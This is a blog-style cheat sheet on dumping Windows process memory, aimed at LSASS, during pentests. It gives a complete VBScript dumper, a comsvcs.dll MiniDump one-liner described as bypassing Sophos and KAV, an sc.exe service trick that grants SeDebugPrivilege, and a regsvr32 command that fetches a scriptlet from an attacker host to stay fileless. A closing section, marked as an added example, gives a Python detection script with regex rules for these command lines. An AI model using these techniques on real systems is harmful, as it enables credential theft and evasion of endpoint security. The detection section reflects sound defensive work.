Windows Memory Dump Cheatsheet

ismail kaleem
2 min read, Jan 7, 2020


Procdump is painful to use, as most AV software now detects it.

The cheat-sheet below can be useful during memory forensics or pentests.

Method #1 — Using CSCRIPT

Since neither rundll32 nor comsvcs!MiniDumpW enables the debug privilege required to access lsass.exe, the following VBScript obtains it by connecting to WMI with the Debug privilege set and launching rundll32 through Win32_Process.Create, so the child inherits it. It works when run from an elevated process.

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
  WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
  WScript.StdOut.WriteLine("Usage: procdump <process>")
  WScript.Quit
Else
  Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp

  ' get process id or name
  pid = WScript.Arguments(0)

  ' connect to WMI with the Debug privilege (SeDebugPrivilege) enabled
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set svc = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")

  ' if not a number, look the process up by name instead of id
  If (Not IsNumeric(pid)) Then
    query = "Name"
  Else
    query = "ProcessId"
  End If

  ' try to find it
  Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
    query & " = '" & pid & "'")

  If (list.Count = 0) Then
    WScript.StdOut.WriteLine("Can't find active process : " & pid)
    WScript.Quit()
  End If

  ' take the first match
  For Each proc In list
    pid = proc.ProcessId
    str = proc.Name
    Exit For
  Next
  dmp = fso.GetBaseName(str) & ".bin"

  ' if dump file already exists, try to remove it
  If (fso.FileExists(dmp)) Then
    WScript.StdOut.WriteLine("Removing " & dmp)
    fso.DeleteFile(dmp)
  End If

  WScript.StdOut.WriteLine("Attempting to dump memory from " & _
    str & ":" & pid & " to " & dmp)

  ' spawn rundll32 hidden, via WMI, so it inherits the Debug privilege
  Set proc = svc.Get("Win32_Process")
  Set startup = svc.Get("Win32_ProcessStartup")
  Set cfg = startup.SpawnInstance_
  cfg.ShowWindow = SW_HIDE
  cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
    pid & " " & fso.GetAbsolutePathName(".") & "\" & _
    dmp & " full"

  Call proc.Create(cmd, Null, cfg, pid)

  ' sleep for a second to give the dump time to complete
  WScript.Sleep(1000)

  If (fso.FileExists(dmp)) Then
    WScript.StdOut.WriteLine("Memory saved to " & dmp)
  Else
    WScript.StdOut.WriteLine("Something went wrong.")
  End If
End If

Run it from an elevated command prompt.

Most EDR products will still block this.

Method #2 — Using PowerShell or CMD

Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full

This bypasses some common antivirus products such as Sophos Antivirus and KAV.

Method #3 — Using SC

Administrative users can use the Windows Service Controller (sc.exe) to create a service that runs our command, assign the debug privilege to that service, and then start it. The following commands can be run from an elevated command prompt to create a MiniDump of LSASS (note that sc.exe requires a space after "binpath="):

  • sc create test binpath= "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full"
  • sc privs test SeDebugPrivilege
  • sc start test

Method #4 — Using regsvr32

The following .sct scriptlet is hosted on your attacker-controlled host.

Remember to replace <procid> with the target process ID.

<?XML version="1.0"?>
<scriptlet>
  <registration
    progid="Pentest"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
      <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("cmd /k Powershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <procid> lsadump.bin full");
      ]]>
    </script>
  </registration>
</scriptlet>

This can be made fully fileless by passing the scriptlet URL to /i, leaving few traces on disk. Windows Event Viewer would only show that wscript.exe was executed.

regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll
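All four methods end up on the same small set of command lines, which is what a defender should hunt for in process-creation telemetry. The following is an added example, not part of the original post: a Python detection pass over constructed Sysmon-style process-creation records (Image|ParentImage|CommandLine, all sample lines made up here) that flags the comsvcs.dll MiniDump export used by Methods 1, 2 and 4 (and embedded in Method 3's service binpath), the SeDebugPrivilege grant from Method 3, and the remote-scriptlet regsvr32 invocation from Method 4. It matches on the export name rather than a target PID, since the PID alone does not say which process is being dumped; resolve it against process telemetry to confirm lsass.exe.

```python
import re

# Constructed sample records (Image|ParentImage|CommandLine); not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\rundll32.exe|C:\Windows\System32\cscript.exe|rundll32 C:\windows\system32\comsvcs.dll, MiniDump 624 C:\work\lsass.bin full",
    r"C:\Windows\System32\rundll32.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 624 dump.bin full",
    r'C:\Windows\System32\sc.exe|C:\Windows\System32\cmd.exe|sc create test binpath= "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 dump.bin full"',
    r"C:\Windows\System32\sc.exe|C:\Windows\System32\cmd.exe|sc privs test SeDebugPrivilege",
    r"C:\Windows\System32\regsvr32.exe|C:\Windows\System32\cmd.exe|regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll",
    r"C:\Windows\System32\rundll32.exe|C:\Windows\explorer.exe|rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r"C:\Windows\System32\sc.exe|C:\Windows\System32\cmd.exe|sc query wuauserv",
]

RULES = {
    # Methods 1, 2 and 4 (and Method 3's binpath) all call the MiniDump export of
    # comsvcs.dll; tolerate the spacing/comma variations seen on the page.
    "comsvcs_minidump": re.compile(r"comsvcs\.dll\s*,\s*minidump\b", re.I),
    # Method 3: a service being granted SeDebugPrivilege (sc privs accepts a '/'-separated list).
    "sc_sedebugprivilege": re.compile(r"\bsc(?:\.exe)?\s+privs\s+\S+\s+\S*SeDebugPrivilege\b", re.I),
    # Method 4: regsvr32 loading a remote scriptlet through scrobj.dll.
    "regsvr32_remote_scriptlet": re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b", re.I),
}


def match_event(record):
    """Return the names of every rule whose pattern matches the record's command line."""
    _image, _parent, cmdline = record.split("|", 2)
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(records):
    """Map each rule name to the list of record indexes it fired on."""
    hits = {name: [] for name in RULES}
    for i, record in enumerate(records):
        for name in match_event(record):
            hits[name].append(i)
    return hits


if __name__ == "__main__":
    for name, idx in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {idx}")
```

Because the service created in Method 3 launches rundll32 with services.exe as its parent, and Method 1 launches it from cscript.exe, the parent image is a useful second pivot once the comsvcs rule fires.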
